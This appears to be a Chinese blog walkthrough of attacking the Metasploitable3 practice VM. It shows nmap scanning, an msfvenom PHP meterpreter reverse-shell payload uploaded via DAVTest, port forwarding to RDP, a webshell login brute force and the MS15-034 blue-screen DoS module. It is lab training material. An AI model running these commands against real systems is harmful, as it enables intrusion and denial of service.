metasploitable2基于ubantu的渗透演练环境。Rapid7官方长时间未更新,导致跟不上当前的节奏。metasploitable3出世。

metasploitable2配合metasploit的模块进行使用,速度很快。

metasploitable3更加难被攻破,有些漏洞在metasploit中没有漏洞利用模块,需要测试人员自己挖掘。

一台metasploitable是不够用的,真实攻击中都会牵连到很多服务器和计算机,它可以扩展,将metasploitable3安装到多台终端内,建立相关节点。

以下部分是渗透例子之一:从用nmap发现靶机存在多少端口,然后利用kali自带的DAVtest检测是否存在上传漏洞,到生成payload,到打开msf,加载exploit/multi/handler模块,设置好本地的端口与地址

推荐参考资料:https://jingyan.baidu.com/article/7f766daf9cced24100e1d046.html    这是对win7系统的攻击

面对靶机时,踩点:nmap网络扫描工具      【kali nmap的使用】

nmap -sS -sV -v -n -p- -oX demon.xml 192.168.1.151      【内网靶机不需要解析DNS】

扫描结果关注到8585端口   存在 http   php   dav等应用     【对扫描结果的解读】

DAVTest上传测试的可执行文件,渗透测试快,轻松确定是否启用DAV服务攻击。      【漏洞测试】

msfvenom -p php/meterpreter_reverse_tcp  LHOST=192.168.1.152 LPORT=5555 -f raw >davtext.php    【生成反向链接攻击载荷,后门】

msfconsole                   【生成载荷以后,本地也要启动服务】

msf > use exploit/multi/handler                          【生成载荷以后,本地也要启动服务】

set PAYLOAD php/meterpreter_reverse_tcp              【生成载荷以后,本地也要启动服务】

show options                     【看一些设置有些什么东西】

set LHOST 192.168.1.152

set LPORT 5555                【设置一下,跟载荷对应上】

davtest               【看一下帮助信息,用于生成以下命令】

davtest -url http://192.168.1.151:8585/uploads -uploadfile davtest.php -uploadloc DavTestDirXp317s2YNZmKZKU/demon.php  【上传攻击载荷到靶机】

exploit         【处于监听状态,靶机一点文件这个地方就会弹出meterpreter会话】

help      【看一下meterpreter的帮助信息】

shell       【跟dos命令差不多】

rdesktop 192.168.1.151:3389           【手动链接一下远程桌面,看看有没有防火墙】

portfwd -h           【看一下meterpreter的端口转发帮助信息】

portfwd add -l 7777 -p 3389 -r 192.168.1.151       【将本机的7777端口转发到目标机的3389端口】

rdesktop   127.0.0.1:7777                【本地转发设置好了以后,访问本地就等于访问了目标机,这就是转发的情况体现】

meterpreter > background       【退出】

msf exploit(handler) >  back    【退出】

msf > services

msf > workspace  -a davtest     【创建一个工作区】

msf > db_                【看一下数据库功能】

msf > db_import demon.xml   【数据库导入看一下扫描结果的报告】

msf > services  【看一下扫描结果的报告】

ssh -L 3389:loaclhost:3389 vagrant@192.168.1.151       【将本机3389转发到对方3389,这里需要寻找ssh的账号密码】

nmap -p 3389 192.168.1.151           【扫描一下3389】

nmap -p 3389 127.0.0.1         【扫描一下本机的3389】

rdesktop   127.0.0.1:3389        【设置好本地的端口转发后,直接访问本地就等于访问目标机器的IP+端口】

官方wiki      无语了,中国菜刀都被他们看见了。

https://github.com/rapid7/metasploitable3/wiki/Vulnerabilities

1.chinese caidao   ----中国菜刀,加入了中国菜刀元素:一句话木马       位置:http://localhost/caidao.asp

2.80端口 --http    MS15-034/CVE-2015-1635  HTTP远程代码执行漏洞(远程蓝屏代码)(远程溢出漏洞)

微软IIS 6.0以上的windows server 2008 R2/2012/2012 R2以及windows 7/8/8.1系统都会受到这个漏洞影响

模块位置   msf:use  auxiliary/dos/http/ms15_034_ulonglongadd

进阶:如果找到其他应用软件的各种漏洞利用模块,如上,要弄一个人将变得极其简单化。

【危害还是非常大的,不要玩火,不得攻击他人。打不过你报警来凑】

msf > search caidao                 【漏洞利用模块举例】

msf > use auxiliary/scanner/http/caidao_bruteforce_login                  【菜刀扫描模块】

show options       【查看设置】

set RHOSTS 192.168.1.151          【设置目标机】

set THREADS 10   【设置线程】

set TARGETURI /caidao.asp

run

search ms 15_034      【搜索远程蓝屏代码漏洞编号】

use auxiliary/dos/http/ms15_034_ulonglongadd          【执行蓝屏代码漏洞的载荷模块】

show options

set RHOSTS 192.168.1.151

exploit             【服务器马上蓝屏】

其他参考资料

hacking metasploitable 2

http://www.youtube.com/watch?v=jDqmEY_3zY&t=1625s&index=3&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD

www.youtube.com/watch?v=JoV1aSuy1XU&index=4&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD

www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&t=33393s&index=1

MSF精华合集      ZANYAR MATRIX发布的

www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&index=1&spfreload=10

书籍

菜鸟腾飞 :metasploit渗透测试平台之应用 --飞飞

T00LS metasploit  第一季度 第二季   ---羽翼

5期-Metasploitable3专题课程的更多相关文章

  1. 最新linux运维高级架构课13期 架构师课程

    有会员购买的,分享给大家.完整一套,可以学习一下.     ├─L001-2017linux运维高级架构师13期-运维与自动化运维发展-10节 │      1-1运维职业发展.avi │      ...

  2. 图灵学院java架构师vip课程第二期 完整版课程下载 无加密

    部分目录2020年新图灵学院Java二期架构师教程下载[课程目录]├──一.VIP课程:互联网工程专题├──二.VIP课程:源码框架专题├──三.VIP课程:并发编程专题├──四.VIP课程:性能调优 ...

  3. python22期第一天(课程总结)

    1.Python介绍: python是一门高级编程语言,涉及领域比较广泛,社区活跃,由一个核心开发团队在维护,相对其他语言,易于学习,可移植性强,可扩展性强,易于维护,有大量的标准库可供使用. 2.P ...

  4. 最新咕咆+鲁班+图灵+享学+蚂蚁+硅谷+源码 Java架构师资料《Java架构师VIP课程》

    最新的Java架构师完整资料,完整视频+源码+文档. 每一套都是一百多个G的资料,无密. JAVA架构师全套课程 咕泡学院互联网架构师第一期 咕泡学院互联网架构师第二期 咕泡学院互联网架构师第三期 博 ...

  5. iOS移动开发周报-第25期

    iOS移动开发周报-第25期 [摘要]:本期iOS移动开发周报带来如下内容:苹果发布 iPhone6 和 Apple Watch.Swift 1.0 GM发布.Xcode 6支持PDF Vector作 ...

  6. MSDN Webcast 系列课程

    云计算(Cloud) 云起龙骧系列课程 网络开发(Web) ASP.NET 4 风云之旅系列课程 ASP.NET 开发实践系列课程 MOSS2007 最佳实战 StepByStep 系列课程 Silv ...

  7. Web前端开发推荐阅读书籍、学习课程下载

    转自http://www.xuanfengge.com/fe-books.html 前言 学校里没有前端的课程,那如何学习JavaScript,又如何使自己成为一个合格的前端工程师呢? 除了在项目中学 ...

  8. day81:luffy:课程分类页面&课程信息页面&指定分类显示课程信息&分页显示课程信息

    目录 1.构建课程前端初始页面 2.course后端的准备工作 3.后端实现课程分类列表接口 4.前端发送请求-获取课程分类信息 5.后端实现课程列表信息的接口 6.前端显示列表课程信息 7.按照指定 ...

  9. Django之Model

    一.字段 常用字段: AutoField:int自增列,必须填入参数 primary_key=True.当model中如果没有自增列,则自动会创建一个列名为id的列. IntergerField:一个 ...

随机推荐

  1. SSH简单Demo

    web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app version="3 ...

  2. 微信公众号获取微信token

    微信在公众号和小程序的开发都有开放文档一般看文档开发就行,很简单这里写一个小demo获取微信token,之后根据自己的业务获取信息处理即可 package com.demo.ccx; import o ...

  3. Vue 实现一个分页组件

    实现分页组件要分三个部分 样式,逻辑,和引用 首先新建一个vue文件用来承载组件内容 第一步:构建样式 <template> <nav> <ul class=" ...

  4. 行人重识别(ReID) ——基于深度学习的行人重识别研究综述

    转自:https://zhuanlan.zhihu.com/p/31921944 前言:行人重识别(Person Re-identification)也称行人再识别,本文简称为ReID,是利用计算机视 ...

  5. windows重装系统之前与之后进行的操作

    1.原系统的备份 避免重装遇到故障无法恢复,给自己留一条后路. 重装系统之前首先进行一次系统备份,我使用的备份软件是dism++,这个软件还可以完成其他的诸如空间回收.系统优化等操作: 软件地址:ht ...

  6. fiddler 手机抓包,CS端抓包 使用记录

    1.允许远程连接 2.忽略https证书错误 3.设置代理 4.重启fiddle 5.PC客户端抓包分工具FIddler+Proxifer https://blog.csdn.net/sunbo_cs ...

  7. Codeforces Round #340 (Div. 2) E. XOR and Favorite Number (莫队)

    题目链接:http://codeforces.com/contest/617/problem/E 题目大意:有n个数和m次查询,每次查询区间[l, r]问满足ai ^ ai+1 ^ ... ^ aj ...

  8. Linux 部署或升级openssh7.5p1

    运维Linux系统,部署或升级openssh是经常面临的事,以下已redhat6和redhat7为例. 在redhat6中部署openssh会有什么坑,在编辑openssh源码包时会报一些类似的错误, ...

  9. iOS----收集的一些小技巧

    1,如何将试图置于最顶层 第一种方法 _myview.layer.zPosition =5; 第二种方法 [self.view insertSubview:_MyView atIndex:999]; ...

  10. jquery常用用法

    1.$("prve + next" )                          选择紧接着在perve后的next元素2.$("#div1 > *&quo ...